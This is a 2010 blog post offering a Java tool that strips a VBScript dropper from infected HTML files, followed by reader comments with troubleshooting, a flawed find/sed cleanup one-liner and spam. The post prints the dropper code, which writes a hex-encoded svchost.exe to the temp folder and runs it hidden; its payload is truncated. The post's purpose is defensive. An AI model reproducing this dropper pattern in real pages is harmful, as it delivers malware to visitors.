Monday, August 9, 2010

Script VB Dropper malware remover only for the infected html

We got infection of virus on pc last week. It is a new one and I found some discussions on the internet, for example this one:

http://www.bleepingcomputer.com/forums/topic336927.html

but found no real solution.

My colleague Dennis Sachs figured out that the avast! Pro Antivirus can deal this kind of malware. We gave it a shot and it works! Thanks Dennis! All infected exe, dll files are repaired and all infected html files were found. Then we got another problem: they can not be fixed by that program. It is Okay, I can write a Remover programm to handle it.

ATTENTION: this tool will ONLY handle all infected html/htm files. For fixing the infected .exe and .dll files, an antivirus program is still needed.

To check wether a html file is infected, you should just take a look at the bottom of the html/htm file. If you see the following code, congratulations! it is infected:


<SCRIPT language="VBScript"><! --
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000 // very long here...
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->

you can use this tool to fix all infected html files.


How to use it:

1. java must be insalled on your computer.
2. download the VBSDropperRemover.jar and save it to [downloadedPath]\VBSDropperRemover.jar.
3. create a new directory [downloadedPath]\lib.

Or, you can also just download this zip file and extract it to your [downloadedPath].

call:

java -jar [downloadedPath]\VBSDropperRemover.jar






29 comments:

Unknown said...

Mcaffe keep assuring me that this code is not a problem!!!

Jules said...

Picked this up myself at some point recently, just wanted to warn people that disinfecting the HTML files is not enough to deal with it: judging by the file modification timestamps, it has also been systematically modifying all the .exe and .dll files on my computer as well. I can only guess what the modifications do.

Am off to disconnect and do an OS reinstall.

Unknown said...

Oh it does affect all exe and dll files. It destroys most of the restore points and autoruns from the registry, but prevents deletion of the affected key.

you wouldn't volunteer for it.

McAfee team looked at the code which I showed them (remote access) using notpad and they insust its nothimgn to worry about - I'm no VB programmer or virsu expert but it looks very ominous to me. Opening any page with explorer and running that script is not soemthing I'm prepared to do.

Can't get the .jar file on this page to do anything in windows 7 though. Am I overlooking something?

Unknown said...

This Jar file is not working. Can you give any tool through which I can fix my HTML's ?

Here is the exception when I run this one on my windows xp. Do I need to install anything else

Exception in thread "AWT-EventQueue-0" java.lang.NoClassDefFoundError: groovy/lang/GroovyObject
at java.lang.ClassLoader.defineClass1(Native Method)
at java.lang.ClassLoader.defineClassCond(Unknown Source)
at java.lang.ClassLoader.defineClass(Unknown Source)
at java.security.SecureClassLoader.defineClass(Unknown Source)
at java.net.URLClassLoader.defineClass(Unknown Source)
at java.net.URLClassLoader.access$000(Unknown Source)
at java.net.URLClassLoader$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
at demo.VBSDropperRemover.(VBSDropperRemover.java:50)
at demo.VBSDropperRemover$6.run(VBSDropperRemover.java:251)
at java.awt.event.InvocationEvent.dispatch(Unknown Source)
at java.awt.EventQueue.dispatchEvent(Unknown Source)
at java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source)
at java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)
at java.awt.EventDispatchThread.pumpEventsForHierarchy(Unknown Source)
at java.awt.EventDispatchThread.pumpEvents(Unknown Source)
at java.awt.EventDispatchThread.pumpEvents(Unknown Source)
at java.awt.EventDispatchThread.run(Unknown Source)
Caused by: java.lang.ClassNotFoundException: groovy.lang.GroovyObject
at java.net.URLClassLoader$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
... 22 more

Unknown said...

Thanks for the blog post. Wierdly, Avast free finds the virus in the htm files, but not in the exe or dlls!

So at the moment, I cant find a free way to repair the exe and dlls.

Anyone have any ideas?

Unknown said...

Actually, when I try to run this, I am getting the same error as Saadi. It would be really useful to have this handy tool.

Do we need to install anything else Jing?

Unknown said...

Sorry, the run environment was not correctly described. I have updated my blog. Now the tool should work.

Unknown said...

Thanks, works great. Just need to find a way to fix the exe files now!

Øystein Krog said...

Thanks for this, worked great for fixing my .html files.
Please modify the tool so that it will clean .htm files as well!

Unknown said...

.htm file has been handled too. I did write it.

Bart said...

Hi Jing, I installed your tool and first selected a single folder as a root folder where I copied some of the infected html files to. The application ran but said that all files were not infected where, when I opened them using notepad, they clearly had the malicious VB Script code at the end.

Bart said...

Jing, Is there anything that causes the application not to detect the malicious vb script code at the bottom of my html / htm files please?

I desperately want it removed from my files and doing it manually is not really an option as I detect over 1,000 files.

tward2003 said...

Same question as Bart above.

I have over 47,000 infected html/htm files and this script says they are "not infected"

Thank you for the effort though, as there is nothing else out there even attempting to do this.

cihan said...

Thank you very much. This VBSDropperRemover saved the day.

For those who want to eliminate the virus and reapir HTML files, the following procedures may be helpful:

1) Download and Open Process Explorer
2) Locate blue svchost.exe processes which has also description "Generic Host Process for Win32 Services". (Don't interfere with pink svchost.exe processes.) There must be two of them at the end of the process list.
3) Right click and "Suspend" these two svchost.exe. (If you kill the process, they will open up again.)
4) Restore your HTML files to their original folders if your antivirus software moved them to quarantine. (At this point antivirus may also remove the malicious codes from HTML files)
5) Then scan your computer with VBSDropperRemover.
6)Scan your computer with antivirus.

Anonymous said...

Hi, thanks for the tool, it saves lots of time.

Although I found that it didn't clean some html files. When I open the files with text editor, there's a comment block with random code at the end of the file, after the vbscript block ().

It'll be great if your tool can cover this...

Cynthia said...

say... thanks a bunch for writing this remover tool. It really help me out. However the tool is case sensitive. With this tool i have to search for HTM/HTML and rename it to htm/html. Can you add HTML and HTM extension?
thank you very much.

Edi Sutrisno said...

Where is the download link... I can't find it... :'(

Unknown said...

Hello Edi Sutrisno,

I have updated the download links of the zip file. Please try it again.

Ivo B. said...

Hello Jing Ge,

thanks very much for sharing this script! I was able to repair a lot of infected files.

There is still one problem though.
Some files which are located deeper in the directory structure, don't get repaired. (if I select the folder directly it works just fine, but with a root folder it doesnt work)

Does the program have some depth limitations?
Is it possibly related to the fact that some of my folder names contain special characters (german umlaut etc).?
Is there an easy way to call the script directly from the command line with a folder parameter?
(this way i could create a list of all my folders and call the script for every folder separately)

Thanks for your support!

Unknown said...

Thank you sooooo much dear Jing Ge
your Code is awesome man, u r great, u saved my ton of work. Thank you.

My exp : I scanned my pc with, Mbam, but after reboot i have found virus again, so I have scanned my pc in safe mode, with mbam, and it works

after that, i have scanned all my drives one by one with VBSDropperRemover.jar, and all html files repaired amazingly. Thanx once again

dueepjs said...

Thank you so much Jing, you are a lifesaver.
I reinstalled os, after I used the jar to clean up my html.
And found that there were some files infected which I had overlooked. So before I opened them up in DW (thus FUBARing up DW)I ran this cleaner. Hey, there were 12 files infected which are squeaky clean now. How can we spread the word about your hard work. People need to know about you !

TaylorMade said...

It does not detect the malicious code in my files. Is there any way your tool can be adjusted to clean this?

(this form will clearly not allowed me to post the code here, so a put a screenshot here:

http://storage.eliataylor.com/VBScriptVirus.jpg

TaylorMade said...

FYI:

run this command in a Bash shell or Cygwin to clean all html files if you're sure everything are the </html> can be erased:

find . -type f -iname "*.htm*" -exec sed -i '/</html>/iq' {} ;

TaylorMade said...

CORRECTION:

the /gi was meant to do a case-insentive search on the html tag. It does not work. Just use /g:

find . -type f -iname "*.htm*" -exec sed -i '/</html>/q' {}

If anyone has a better regex for this, please post.

Unknown said...

Thanks a lot for that JAVA application....actually I am also a JAVA Programmer, so I was also thinking to make such application(which can search for all HTML files and delete that VB Script) so that I have not to delete that script by editing each HTML file as it would be very time consuming for me but before I could try to make such JAVA app, I found it on the internet in your blog......THANKS dude

Unknown said...

威而鋼 壯陽藥 壯陽藥 威而鋼 威而鋼 威而鋼 威而鋼 威而鋼 威而鋼 威而鋼 威而鋼 犀利士哪裡買 壯陽藥品 壯陽藥 威而鋼 威而鋼哪裡買 威而鋼專賣店 威而鋼藥局 情色貼圖說“男子三十猛如虎”。“明白”的人威而鋼 犀利士 犀利士 犀利士 威而鋼 犀利士 威而鋼 犀利士 犀利士都知道,這是指30歲男人正值精力充沛、性欲旺盛時期。可是,我的先生偏偏犀利士 壯陽藥 威而鋼 犀利士 犀利士專賣 犀利士 犀利士5mg價格 壯陽藥品 犀利士專賣 威而鋼 壯陽藥 犀利士 威而鋼 威而鋼 犀利士 犀利士就在30多歲的時候性功能出了問題,“性福”之花眼看就要“發蔫”。情急之下,經過我們愛心的共同培育,終使我家“犀利士 犀利士 犀利士 威而鋼 威而鋼 威而鋼哪裡買 威而鋼 威而鋼 威而鋼 威而鋼 犀利士 壯陽藥品去哪買 犀利士 犀利士 犀利士 犀利士 犀利士

Mundana Kakabu said...


I delete them manually.
I searched before deleting the infected files using FileSeek

what do you think?

Hidayat
jasa pembuatan website

Unknown said...

This is the best website with lot of useful information for the reader. Thanks for sharing the post and keep the good works. You are the best, god bless you.
Situs Perusahaan

xuka said...

Pls. Update link download :3